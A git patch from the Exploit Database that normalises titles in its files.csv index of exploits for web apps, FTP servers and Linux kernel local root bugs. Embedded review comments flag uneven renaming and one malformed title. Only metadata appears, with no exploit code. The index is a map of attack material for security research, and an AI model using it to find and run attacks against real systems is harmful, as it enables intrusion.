From ec03ab428f57cd2237dcb17a9f924eae430cbe17 Mon Sep 17 00:00:00 2001 
From: Offensive Security
Date: Thu, 21 Jul 2016 05:06:28 +0000
Subject: [PATCH] DB: 2016-07-21

10 new exploits

Microsoft Internet Explorer <= XP SP2 - HTML Help Control Local Zone Bypass
Microsoft Internet Explorer XP SP2 - HTML Help Control Local Zone Bypass

Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit
Mambo 4.5.3 & Joomla 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit

Simplog <= 0.9.3 - (tid) Remote SQL Injection Exploit
Simplog 0.9.3 - (tid) SQL Injection

Skulltag <= 0.96f - (Version String) Remote Format String PoC
OpenTTD <= 0.4.7 - Multiple Vulnerabilities/Denial of Service Exploit
Skulltag 0.96f - (Version String) Remote Format String PoC
OpenTTD 0.4.7 - Multiple Vulnerabilities

Apple Mac OS X Safari <= 2.0.3 (417.9.2) - Multiple Vulnerabilities (PoC)
Apple Mac OS X Safari 2.0.3 (417.9.2) - Multiple Vulnerabilities

Apple Mac OS X Safari <= 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC
Apple Mac OS X Safari 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC

Aardvark Topsites PHP <= 4.2.2 - (path) Remote File Inclusion
phpMyAgenda <= 3.0 Final (rootagenda) Remote Include
Aardvark Topsites PHP <= 4.2.2 - (lostpw.php) Remote Include Exploit
Aardvark Topsites PHP 4.2.2 - (path) Remote File Inclusion
phpMyAgenda 3.0 Final - (rootagenda) Remote Include
Aardvark Topsites PHP 4.2.2 - (lostpw.php) Remote File Inclusion

X7 Chat <= 2.0 - (help_file) Remote Commands Execution Exploit
X7 Chat 2.0 - (help_file) Remote Command Execution

Auction <= 1.3m (phpbb_root_path) Remote File Include Exploit
Auction 1.3m - (phpbb_root_path) Remote File Inclusion

acFTP FTP Server <= 1.4 - (USER) Remote Buffer Overflow PoC
Quake 3 Engine 1.32b R_RemapShader() Remote Client BoF Exploit
acFTP FTP Server 1.4 - (USER) Remote Buffer Overflow PoC
Quake 3 Engine 1.32b - R_RemapShader() Remote Client BoF Exploit

AWStats <= 6.5 - (migrate) Remote Shell Command Injection Exploit
AWStats 6.5 - (migrate) Remote Shell Command Injection

acFTP FTP Server <= 1.4 - (USER) Remote Denial of Service Exploit
acFTP FTP Server 1.4 - (USER) Remote Denial of Service

PHP-Fusion <= 6.00.306 - Multiple Vulnerabilities
Jetbox CMS <= 2.1 - (relative_script_path) Remote File Inclusion Exploit
ACal <= 2.2.6 - (day.php) Remote File Inclusion
EQdkp <= 1.3.0 - (dbal.php) Remote File Inclusion
PHP-Fusion 6.00.306 - Multiple Vulnerabilities
Jetbox CMS 2.1 - (relative_script_path) Remote File Inclusion
ACal 2.2.6 - (day.php) Remote File Inclusion
EQdkp 1.3.0 - (dbal.php) Remote File Inclusion

Microsoft Internet Explorer <= 6.0.2900 SP2 - (CSS Attribute) Denial of Service
Microsoft Internet Explorer 6.0.2900 SP2 - (CSS Attribute) Denial of Service

Unclassified NewsBoard <= 1.6.1 patch 1 - Arbitrary Local Inclusion Exploit
Unclassified NewsBoard 1.6.1 patch 1 - Local File Inclusion

Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (1)
Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (2)
Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (3)
Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (1)
Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (2)
Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (3)

Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (4)
Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (4)

Linux Kernel <= 2.6.17.4 - (proc) Local Root Exploit
Linux Kernel <= 2.6.17.4 - 'proc' Local Root Exploit

Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Exploit
Linux Kernel 2.4 / 2.6 x86_64) - System Call Emulation Exploit

\o - Local File Inclusion (1st)
Keller Web Admin CMS 0.94 Pro - Local File Inclusion (1)

PulseAudio setuid (Ubuntu 9.04 & Slackware 12.2.0) - Local Privilege Escalation
PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation

Linux Kernel < 2.6.36-rc6 (Redhat/Ubuntu 10.04) - pktcdvd Kernel Memory Disclosure Proof of Concept
Linux Kernel < 2.6.36-rc6 (Redhat / Ubuntu 10.04) - pktcdvd Kernel Memory Disclosure Proof of Concept

Linux Kernel <= 2.2.18 (RH 7.0/6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1)
Linux Kernel <= 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1)

Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)
Django CMS 3.3.0 - (Editor Snippet) Persistent XSS
Drupal RESTWS Module 7.x - Remote PHP Code Execution (Metasploit)
Linux/x86 - execve /bin/sh Shellcode (19 bytes)
Wowza Streaming Engine 4.5.0 - Local Privilege Escalation
Wowza Streaming Engine 4.5.0 - Remote Privilege Escalation
Wowza Streaming Engine 4.5.0 - Add Advanced Admin CSRF
Wowza Streaming Engine 4.5.0 - Multiple XSS
OpenSSHD <= 7.2p2 - Username Enumeration
WordPress Video Player Plugin 1.5.16 - SQL Injection
---
 files.csv | 74 +++---
 platforms/lin_x86/shellcode/40128.c | 115 +++++++++
 platforms/lin_x86/shellcode/40131.c | 37 +++
 platforms/linux/remote/40136.py | 157 ++++++++++++
 platforms/multiple/webapps/40133.html | 60 +++++
 platforms/multiple/webapps/40134.html | 52 ++++
 platforms/multiple/webapps/40135.txt | 117 +++++++++
 platforms/php/remote/40130.rb | 86 +++++++
 platforms/php/webapps/40137.html | 116 +++++++++
 platforms/python/webapps/40129.txt | 349 ++++++++++++++++++++++++++
 platforms/windows/local/40132.txt | 84 +++++++
 11 files changed, 1215 insertions(+), 32 deletions(-)
 create mode 100755 platforms/lin_x86/shellcode/40128.c
 create mode 100755 platforms/lin_x86/shellcode/40131.c
 create mode 100755 platforms/linux/remote/40136.py
 create mode 100755 platforms/multiple/webapps/40133.html
 create mode 100755 platforms/multiple/webapps/40134.html
 create mode 100755 platforms/multiple/webapps/40135.txt
 create mode 100755 platforms/php/remote/40130.rb
 create mode 100755 platforms/php/webapps/40137.html
 create mode 100755 platforms/python/webapps/40129.txt
 create mode 100755 platforms/windows/local/40132.txt
diff --git a/files.csv b/files.csv index ffc3ee371..c41b04897 100755 --- a/files.csv +++ b/files.csv @@ -557,7 +557,7 @@ id,file,description,date,author,platform,type,port 715,platforms/solaris/local/715.c,"Solaris 8/9 - passwd circ() Local Root Exploit",2004-12-24,"Marco Ivaldi",solaris,local,0 716,platforms/solaris/remote/716.c,"Solaris 2.5.1/2.6/7/8 rlogin /bin/login - Buffer Overflow Exploit (SPARC)",2004-12-24,"Marco Ivaldi",solaris,remote,513 718,platforms/linux/local/718.c,"Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Exploit",2004-12-24,"Marco Ivaldi",linux,local,0 -719,platforms/windows/remote/719.txt,"Microsoft Internet Explorer <= XP SP2 - HTML Help Control Local Zone Bypass",2004-12-25,Paul,windows,remote,0 +719,platforms/windows/remote/719.txt,"Microsoft Internet Explorer XP SP2 - HTML Help Control Local Zone Bypass",2004-12-25,Paul,windows,remote,0 720,platforms/php/webapps/720.pl,"Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search)",2004-12-25,anonymous,php,webapps,0 721,platforms/windows/dos/721.html,"Microsoft Windows Kernel - ANI File Parsing Crash",2004-12-25,Flashsky,windows,dos,0 725,platforms/php/webapps/725.pl,"PhpInclude.Worm - PHP Scripts Automated Arbitrary File Inclusion",2004-12-25,anonymous,php,webapps,0 
@@ -1419,23 +1419,23 @@ id,file,description,date,author,platform,type,port 1694,platforms/php/webapps/1694.pl,"Internet PhotoShow (page) - Remote File Inclusion Exploit",2006-04-18,Hessam-x,php,webapps,0 1695,platforms/php/webapps/1695.pl,"PHP Net Tools <= 2.7.1 - Remote Code Execution Exploit",2006-04-18,FOX_MULDER,php,webapps,0 1697,platforms/php/webapps/1697.php,"PCPIN Chat <= 5.0.4 - (login/language) Remote Code Execution Exploit",2006-04-19,rgod,php,webapps,0 -1698,platforms/php/webapps/1698.php,"Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit",2006-04-19,trueend5,php,webapps,0 +1698,platforms/php/webapps/1698.php,"Mambo 4.5.3 & Joomla 1.0.7 - (feed) Path Disclosure and Denial of Service Exploit",2006-04-19,trueend5,php,webapps,0 1699,platforms/php/webapps/1699.txt,"RechnungsZentrale V2 <= 1.1.3 - Remote Inclusion",2006-04-19,"GroundZero Security",php,webapps,0 1700,platforms/asp/webapps/1700.pl,"ASPSitem <= 1.83 - (Haberler.asp) Remote SQL Injection Exploit",2006-04-19,nukedx,asp,webapps,0 1701,platforms/php/webapps/1701.php,"PHPSurveyor <= 0.995 - (surveyid) Remote Command Execution Exploit",2006-04-20,rgod,php,webapps,0 1703,platforms/windows/remote/1703.pl,"Symantec Scan Engine 5.0.x.x Change Admin Password Remote Exploit",2006-04-21,"Marc Bevand",windows,remote,8004 1704,platforms/php/webapps/1704.pl,"CoreNews <= 2.0.1 - (userid) Remote SQL Injection Exploit",2006-04-21,nukedx,php,webapps,0 -1705,platforms/php/webapps/1705.pl,"Simplog <= 0.9.3 - (tid) Remote SQL Injection Exploit",2006-04-21,nukedx,php,webapps,0 +1705,platforms/php/webapps/1705.pl,"Simplog 0.9.3 - (tid) SQL Injection",2006-04-21,nukedx,php,webapps,0 1706,platforms/php/webapps/1706.txt,"dForum <= 1.5 - (DFORUM_PATH) Multiple Remote File Inclusions",2006-04-21,nukedx,php,webapps,0 1707,platforms/php/webapps/1707.pl,"My Gaming Ladder Combo System <= 7.0 - Remote Code Execution Exploit",2006-04-22,nukedx,php,webapps,0 
-1708,platforms/windows/dos/1708.txt,"Skulltag <= 0.96f - (Version String) Remote Format String PoC",2006-04-23,"Luigi Auriemma",windows,dos,0 -1709,platforms/multiple/dos/1709.txt,"OpenTTD <= 0.4.7 - Multiple Vulnerabilities/Denial of Service Exploit",2006-04-23,"Luigi Auriemma",multiple,dos,0 +1708,platforms/windows/dos/1708.txt,"Skulltag 0.96f - (Version String) Remote Format String PoC",2006-04-23,"Luigi Auriemma",windows,dos,0 +1709,platforms/multiple/dos/1709.txt,"OpenTTD 0.4.7 - Multiple Vulnerabilities",2006-04-23,"Luigi Auriemma",multiple,dos,0 1710,platforms/php/webapps/1710.txt,"Clansys <= 1.1 - (index.php page) PHP Code Insertion",2006-04-23,nukedx,php,webapps,0 1711,platforms/php/webapps/1711.txt,"Built2Go PHP Movie Review <= 2B Remote File Inclusion",2006-04-23,"Camille Myers",php,webapps,0 -1712,platforms/osx/dos/1712.html,"Apple Mac OS X Safari <= 2.0.3 (417.9.2) - Multiple Vulnerabilities (PoC)",2006-04-24,"Tom Ferris",osx,dos,0 +1712,platforms/osx/dos/1712.html,"Apple Mac OS X Safari 2.0.3 (417.9.2) - Multiple Vulnerabilities",2006-04-24,"Tom Ferris",osx,dos,0 1713,platforms/php/webapps/1713.pl,"FlexBB <= 0.5.5 - (function/showprofile.php) SQL Injection Exploit",2006-04-24,Devil-00,php,webapps,0 1714,platforms/asp/webapps/1714.txt,"BK Forum <= 4.0 - (member.asp) Remote SQL Injection",2006-04-24,n0m3rcy,asp,webapps,0 -1715,platforms/osx/dos/1715.html,"Apple Mac OS X Safari <= 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC",2006-04-24,"Yannick von Arx",osx,dos,0 +1715,platforms/osx/dos/1715.html,"Apple Mac OS X Safari 2.0.3 - (417.9.2) (ROWSPAN) DoS PoC",2006-04-24,"Yannick von Arx",osx,dos,0 1716,platforms/multiple/dos/1716.html,"Mozilla Firefox <= 1.5.0.2 - (js320.dll/xpcom_core.dll) Denial of Service PoC",2006-04-24,splices,multiple,dos,0 1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 - (long get request) Remote Buffer Overflow Exploit",2006-04-25,c0d3r,linux,remote,0 1718,platforms/hardware/dos/1718.pl,"OCE 3121/3122 Printer (parser.exe) Denial of 
Service Exploit",2006-04-26,sh4d0wman,hardware,dos,0 
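Review bot: the title normalisation in this hunk is applied unevenly. Row 1705 drops both "Remote" and the "Exploit" suffix ("Simplog 0.9.3 - (tid) SQL Injection"), while row 1698 in the same hunk keeps "... Path Disclosure and Denial of Service Exploit", and row 1712 loses its "(PoC)" while 1708 and 1715 keep "PoC". Row 1709 also loses the "Denial of Service" wording, so the title no longer says what the dos-type entry does. Pick one rule for the trailing "Exploit"/"PoC" suffix and the "Remote" qualifier and apply it to every edited row, or leave the wording alone and only remove the "<=".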
@@ -1450,11 +1450,11 @@ id,file,description,date,author,platform,type,port 1727,platforms/php/webapps/1727.txt,"openPHPNuke <= 2.3.3 - Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 1728,platforms/php/webapps/1728.txt,"Knowledge Base Mod <= 2.0.2 - (phpBB) Remote Inclusion",2006-04-29,[Oo],php,webapps,0 1729,platforms/php/webapps/1729.txt,"Limbo CMS <= 1.0.4.2 - (sql.php) Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 -1730,platforms/php/webapps/1730.txt,"Aardvark Topsites PHP <= 4.2.2 - (path) Remote File Inclusion",2006-04-30,[Oo],php,webapps,0 -1731,platforms/php/webapps/1731.txt,"phpMyAgenda <= 3.0 Final (rootagenda) Remote Include",2006-04-30,Aesthetico,php,webapps,0 -1732,platforms/php/webapps/1732.pl,"Aardvark Topsites PHP <= 4.2.2 - (lostpw.php) Remote Include Exploit",2006-04-30,cijfer,php,webapps,0 +1730,platforms/php/webapps/1730.txt,"Aardvark Topsites PHP 4.2.2 - (path) Remote File Inclusion",2006-04-30,[Oo],php,webapps,0 +1731,platforms/php/webapps/1731.txt,"phpMyAgenda 3.0 Final - (rootagenda) Remote Include",2006-04-30,Aesthetico,php,webapps,0 +1732,platforms/php/webapps/1732.pl,"Aardvark Topsites PHP 4.2.2 - (lostpw.php) Remote File Inclusion",2006-04-30,cijfer,php,webapps,0 1733,platforms/php/webapps/1733.pl,"Invision Power Board <= 2.1.5 - (from_contact) SQL Injection Exploit",2006-05-01,"Ykstortion Security",php,webapps,0 -1738,platforms/php/webapps/1738.php,"X7 Chat <= 2.0 - (help_file) Remote Commands Execution Exploit",2006-05-02,rgod,php,webapps,0 +1738,platforms/php/webapps/1738.php,"X7 Chat 2.0 - (help_file) Remote Command Execution",2006-05-02,rgod,php,webapps,0 1739,platforms/osx/remote/1739.pl,"Darwin Streaming Server <= 4.1.2 - (parse_xml.cgi) Code Execution Exploit",2003-02-24,FOX_MULDER,osx,remote,0 1740,platforms/php/webapps/1740.pl,"Fast Click <= 1.1.3 / <= 2.3.8 - (show.php) Remote File Inclusion Exploit",2006-05-02,R@1D3N,php,webapps,0 1741,platforms/linux/remote/1741.c,"MySQL <= 5.0.20 COM_TABLE_DUMP Memory 
Leak/Remote BoF Exploit",2006-05-02,"Stefano Di Paola",linux,remote,3306 
@@ -1462,23 +1462,23 @@ id,file,description,date,author,platform,type,port 1743,platforms/windows/dos/1743.pl,"Golden FTP Server Pro 2.70 - (APPE) Remote Buffer Overflow PoC",2006-05-03,"Jerome Athias",windows,dos,0 1744,platforms/php/webapps/1744.pl,"Albinator <= 2.0.6 - (Config_rootdir) Remote File Inclusion Exploit",2006-05-03,webDEViL,php,webapps,0 1746,platforms/linux/dos/1746.pl,"zawhttpd <= 0.8.23 - (GET) Remote Buffer Overflow DoS",2006-05-04,"Kamil Sienicki",linux,dos,0 -1747,platforms/php/webapps/1747.pl,"Auction <= 1.3m (phpbb_root_path) Remote File Include Exploit",2006-05-04,webDEViL,php,webapps,0 +1747,platforms/php/webapps/1747.pl,"Auction 1.3m - (phpbb_root_path) Remote File Inclusion",2006-05-04,webDEViL,php,webapps,0 1748,platforms/windows/dos/1748.py,"XM Easy Personal FTP Server <= 4.3 - (USER) Remote Buffer Overflow PoC",2006-05-04,rewterz,windows,dos,0 -1749,platforms/windows/dos/1749.pl,"acFTP FTP Server <= 1.4 - (USER) Remote Buffer Overflow PoC",2006-05-04,Preddy,windows,dos,0 -1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b R_RemapShader() Remote Client BoF Exploit",2006-05-05,landser,linux,remote,0 +1749,platforms/windows/dos/1749.pl,"acFTP FTP Server 1.4 - (USER) Remote Buffer Overflow PoC",2006-05-04,Preddy,windows,dos,0 +1750,platforms/linux/remote/1750.c,"Quake 3 Engine 1.32b - R_RemapShader() Remote Client BoF Exploit",2006-05-05,landser,linux,remote,0 1751,platforms/php/webapps/1751.php,"Limbo CMS <= 1.0.4.2 - (catid) Remote SQL Injection Exploit",2006-05-05,[Oo],php,webapps,0 1752,platforms/php/webapps/1752.pl,"StatIt 4 - (statitpath) Remote File Inclusion Exploit",2006-05-05,IGNOR3,php,webapps,0 1753,platforms/php/webapps/1753.txt,"TotalCalendar <= 2.30 - (inc) Remote File Include",2006-05-05,Aesthetico,php,webapps,0 1754,platforms/windows/dos/1754.py,"FileCOPA FTP Server <= 1.01 - (USER) Remote Pre-Auth DoS",2006-05-05,Bigeazer,windows,dos,0 -1755,platforms/cgi/webapps/1755.py,"AWStats <= 6.5 - (migrate) Remote Shell 
Command Injection Exploit",2006-05-06,redsand,cgi,webapps,0 +1755,platforms/cgi/webapps/1755.py,"AWStats 6.5 - (migrate) Remote Shell Command Injection",2006-05-06,redsand,cgi,webapps,0 1756,platforms/php/webapps/1756.pl,"HiveMail <= 1.3 - (addressbook.add.php) Remote Code Execution Exploit",2006-05-06,[Oo],php,webapps,0 -1757,platforms/windows/dos/1757.c,"acFTP FTP Server <= 1.4 - (USER) Remote Denial of Service Exploit",2006-05-06,Omni,windows,dos,0 +1757,platforms/windows/dos/1757.c,"acFTP FTP Server 1.4 - (USER) Remote Denial of Service",2006-05-06,Omni,windows,dos,0 1758,platforms/windows/dos/1758.pl,"TinyFTPD <= 1.4 - (USER) Remote Buffer Overflow DoS",2006-05-06,[Oo],windows,dos,0 1759,platforms/asp/webapps/1759.txt,"VP-ASP 6.00 - (shopcurrency.asp) Remote SQL Injection",2006-05-06,tracewar,asp,webapps,0 -1760,platforms/php/webapps/1760.php,"PHP-Fusion <= 6.00.306 - Multiple Vulnerabilities",2006-05-07,rgod,php,webapps,0 -1761,platforms/php/webapps/1761.pl,"Jetbox CMS <= 2.1 - (relative_script_path) Remote File Inclusion Exploit",2006-05-07,beford,php,webapps,0 -1763,platforms/php/webapps/1763.txt,"ACal <= 2.2.6 - (day.php) Remote File Inclusion",2006-05-07,PiNGuX,php,webapps,0 -1764,platforms/php/webapps/1764.txt,"EQdkp <= 1.3.0 - (dbal.php) Remote File Inclusion",2006-05-07,OLiBekaS,php,webapps,0 +1760,platforms/php/webapps/1760.php,"PHP-Fusion 6.00.306 - Multiple Vulnerabilities",2006-05-07,rgod,php,webapps,0 +1761,platforms/php/webapps/1761.pl,"Jetbox CMS 2.1 - (relative_script_path) Remote File Inclusion",2006-05-07,beford,php,webapps,0 +1763,platforms/php/webapps/1763.txt,"ACal 2.2.6 - (day.php) Remote File Inclusion",2006-05-07,PiNGuX,php,webapps,0 +1764,platforms/php/webapps/1764.txt,"EQdkp 1.3.0 - (dbal.php) Remote File Inclusion",2006-05-07,OLiBekaS,php,webapps,0 1765,platforms/php/webapps/1765.pl,"Dokeos Lms <= 1.6.4 - (authldap.php) Remote File Include Exploit",2006-05-08,beford,php,webapps,0 1766,platforms/php/webapps/1766.pl,"Claroline 
e-Learning 1.75 - (ldap.inc.php) Remote File Inclusion Exploit",2006-05-08,beford,php,webapps,0 1767,platforms/php/webapps/1767.txt,"ActualAnalyzer Server <= 8.23 - (rf) Remote File Include",2006-05-08,Aesthetico,php,webapps,0 @@ -1487,9 +1487,9 @@ id,file,description,date,author,platform,type,port 1772,platforms/windows/local/1772.c,"Intel Wireless Service (s24evmon.exe) Shared Memory Exploit",2006-05-09,"Ruben Santamarta ",windows,local,0 1773,platforms/php/webapps/1773.txt,"phpRaid <= 3.0.b3 - (phpBB/SMF) Remote File Inclusion Vulnerabilities",2006-05-09,"Kurdish Security",php,webapps,0 1774,platforms/php/webapps/1774.txt,"pafileDB <= 2.0.1 - (mxBB/phpBB) Remote File Inclusion",2006-05-09,Darkfire,php,webapps,0 -1775,platforms/windows/dos/1775.html,"Microsoft Internet Explorer <= 6.0.2900 SP2 - (CSS Attribute) Denial of Service",2006-05-10,seven,windows,dos,0 +1775,platforms/windows/dos/1775.html,"Microsoft Internet Explorer 6.0.2900 SP2 - (CSS Attribute) Denial of Service",2006-05-10,seven,windows,dos,0 1776,platforms/windows/remote/1776.c,"Medal of Honor (getinfo) Remote Buffer Overflow Exploit",2006-05-10,RunningBon,windows,remote,12203 -1777,platforms/php/webapps/1777.php,"Unclassified NewsBoard <= 1.6.1 patch 1 - Arbitrary Local Inclusion Exploit",2006-05-11,rgod,php,webapps,0 +1777,platforms/php/webapps/1777.php,"Unclassified NewsBoard 1.6.1 patch 1 - Local File Inclusion",2006-05-11,rgod,php,webapps,0 1778,platforms/php/webapps/1778.txt,"Foing <= 0.7.0 - (phpBB) Remote File Inclusion",2006-05-12,"Kurdish Security",php,webapps,0 1779,platforms/php/webapps/1779.txt,"Php Blue Dragon CMS <= 2.9 - Remote File Include",2006-05-12,Kacper,php,webapps,0 1780,platforms/php/webapps/1780.php,"phpBB <= 2.0.20 - (Admin/Restore DB/default_lang) Remote Exploit",2006-05-13,rgod,php,webapps,0 
@@ -1710,16 +1710,16 @@ id,file,description,date,author,platform,type,port 2001,platforms/windows/dos/2001.c,"Microsoft Word 2000/2003 Unchecked Boundary Condition",2006-07-10,"naveed afzal",windows,dos,0 2002,platforms/php/webapps/2002.pl,"EJ3 TOPo 2.2 - (descripcion) Remote Command Execution Exploit",2006-07-10,Hessam-x,php,webapps,0 2003,platforms/php/webapps/2003.txt,"SQuery <= 4.5 - (gore.php) Remote File Inclusion",2006-07-10,SHiKaA,php,webapps,0 -2004,platforms/linux/local/2004.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (1)",2006-07-11,"dreyer & RoMaNSoFt",linux,local,0 -2005,platforms/linux/local/2005.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (2)",2006-07-12,"Julien Tinnes",linux,local,0 -2006,platforms/linux/local/2006.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (3)",2006-07-13,"Marco Ivaldi",linux,local,0 +2004,platforms/linux/local/2004.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (1)",2006-07-11,"dreyer & RoMaNSoFt",linux,local,0 +2005,platforms/linux/local/2005.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (2)",2006-07-12,"Julien Tinnes",linux,local,0 +2006,platforms/linux/local/2006.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (3)",2006-07-13,"Marco Ivaldi",linux,local,0 2007,platforms/php/webapps/2007.php,"phpBB 3 - (memberlist.php) Remote SQL Injection Exploit",2006-07-13,rgod,php,webapps,0 2008,platforms/php/webapps/2008.php,"Phorum 5 - (pm.php) Arbitrary Local Inclusion Exploit",2006-07-13,rgod,php,webapps,0 2009,platforms/php/webapps/2009.txt,"CzarNews <= 1.14 - (tpath) Remote File Inclusion",2006-07-13,SHiKaA,php,webapps,0 2010,platforms/php/webapps/2010.pl,"Invision Power Board 2.1 <= 2.1.6 - Remote SQL Injection Exploit",2006-07-14,RusH,php,webapps,0 -2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (4)",2006-07-14,Sunay,linux,local,0 
+2011,platforms/linux/local/2011.sh,"Linux Kernel 2.6.13 <= 2.6.17.4 - 'sys_prctl()' Local Root Exploit (4)",2006-07-14,Sunay,linux,local,0 2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) <= 1.1.5 - (CLIENT-IP) SQL Injection Exploit",2006-07-15,rgod,php,webapps,0 -2013,platforms/linux/local/2013.c,"Linux Kernel <= 2.6.17.4 - (proc) Local Root Exploit",2006-07-15,h00lyshit,linux,local,0 +2013,platforms/linux/local/2013.c,"Linux Kernel <= 2.6.17.4 - 'proc' Local Root Exploit",2006-07-15,h00lyshit,linux,local,0 2014,platforms/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 - Remote Buffer Overflow Exploit",2006-07-15,"Pablo Isola",windows,remote,515 2015,platforms/linux/local/2015.py,"Rocks Clusters <= 4.1 - (umount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0 2016,platforms/linux/local/2016.sh,"Rocks Clusters <= 4.1 - (mount-loop) Local Root Exploit",2006-07-15,"Xavier de Leon",linux,local,0 
@@ -4105,7 +4105,7 @@ id,file,description,date,author,platform,type,port 4457,platforms/php/webapps/4457.txt,"Softbiz Classifieds PLUS (id) Remote SQL Injection",2007-09-26,"Khashayar Fereidani",php,webapps,0 4458,platforms/asp/webapps/4458.txt,"Novus 1.0 - (notas.asp nota_id) Remote SQL Injection",2007-09-26,ka0x,asp,webapps,0 4459,platforms/php/webapps/4459.txt,"ActiveKB Knowledgebase 2.? (catId) Remote SQL Injection",2007-09-26,Luna-Tic/XTErner,php,webapps,0 -4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Exploit",2007-09-27,"Robert Swiecki",linux,local,0 +4460,platforms/linux/local/4460.c,"Linux Kernel 2.4 / 2.6 x86_64) - System Call Emulation Exploit",2007-09-27,"Robert Swiecki",linux,local,0 4461,platforms/php/webapps/4461.txt,"lustig.cms BETA 2.5 - (forum.php view) Remote File Inclusion",2007-09-27,GoLd_M,php,webapps,0 4462,platforms/php/webapps/4462.txt,"Chupix CMS 0.2.3 - (repertoire) Remote File Inclusion",2007-09-27,0in,php,webapps,0 4463,platforms/php/webapps/4463.txt,"integramod nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",php,webapps,0 
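Review bot: the replacement row 4460 drops the opening parenthesis, leaving an unmatched ")" in "Linux Kernel 2.4 / 2.6 x86_64) - System Call Emulation Exploit". The removed line had "(x86_64)"; the new line should read "Linux Kernel 2.4 / 2.6 (x86_64) - System Call Emulation Exploit" (or drop both parentheses). The same broken title is repeated in the commit message, so fix it there too.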
@@ -5574,7 +5574,7 @@ id,file,description,date,author,platform,type,port 5952,platforms/php/webapps/5952.txt,"phpBLASTER CMS 1.0 RC1 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,CraCkEr,php,webapps,0 5954,platforms/php/webapps/5954.txt,"A+ PHP Scripts Nms Insecure Cookie Handling",2008-06-26,"Virangar Security",php,webapps,0 5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 - (params.php) Remote File Inclusion",2008-06-26,Ciph3r,php,webapps,0 -5956,platforms/php/webapps/5956.txt,"\o - Local File Inclusion (1st)",2008-06-26,StAkeR,php,webapps,0 +5956,platforms/php/webapps/5956.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion (1)",2008-06-26,StAkeR,php,webapps,0 5957,platforms/php/webapps/5957.txt,"otmanager CMS 24a - (LFI/XSS) Multiple Vulnerabilities",2008-06-27,"CWH Underground",php,webapps,0 5958,platforms/php/webapps/5958.txt,"w1l3d4 philboard 1.2 - (blind sql/XSS) Multiple Vulnerabilities",2008-06-27,Bl@ckbe@rD,php,webapps,0 5959,platforms/php/webapps/5959.txt,"OTManager CMS 2.4 Insecure Cookie Handling",2008-06-27,"Virangar Security",php,webapps,0 
@@ -8685,7 +8685,7 @@ id,file,description,date,author,platform,type,port 9205,platforms/php/webapps/9205.txt,"mcshoutbox 1.1 - (SQL/XSS/shell) Multiple Vulnerabilities",2009-07-20,SirGod,php,webapps,0 9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 - (pecoff executable) Local Denial of Service Exploit",2009-07-20,"Shaun Colley",freebsd,dos,0 9207,platforms/linux/local/9207.sh,"PulseAudio setuid - Local Privilege Escalation Exploit",2009-07-20,anonymous,linux,local,0 -9208,platforms/linux/local/9208.txt,"PulseAudio setuid (Ubuntu 9.04 & Slackware 12.2.0) - Local Privilege Escalation",2009-07-20,anonymous,linux,local,0 +9208,platforms/linux/local/9208.txt,"PulseAudio setuid (Ubuntu 9.04 / Slackware 12.2.0) - Local Privilege Escalation",2009-07-20,anonymous,linux,local,0 9209,platforms/hardware/remote/9209.txt,"DD-WRT - (httpd service) Remote Command Execution",2009-07-20,gat3way,hardware,remote,0 9211,platforms/php/webapps/9211.txt,"Alibaba-clone CMS - (SQL/bSQL) Remote SQL Injection Vulnerabilities",2009-07-20,"599eme Man",php,webapps,0 9212,platforms/windows/dos/9212.pl,"Acoustica MP3 Audio Mixer 2.471 - (.sgp) Crash Exploit",2009-07-20,prodigy,windows,dos,0 
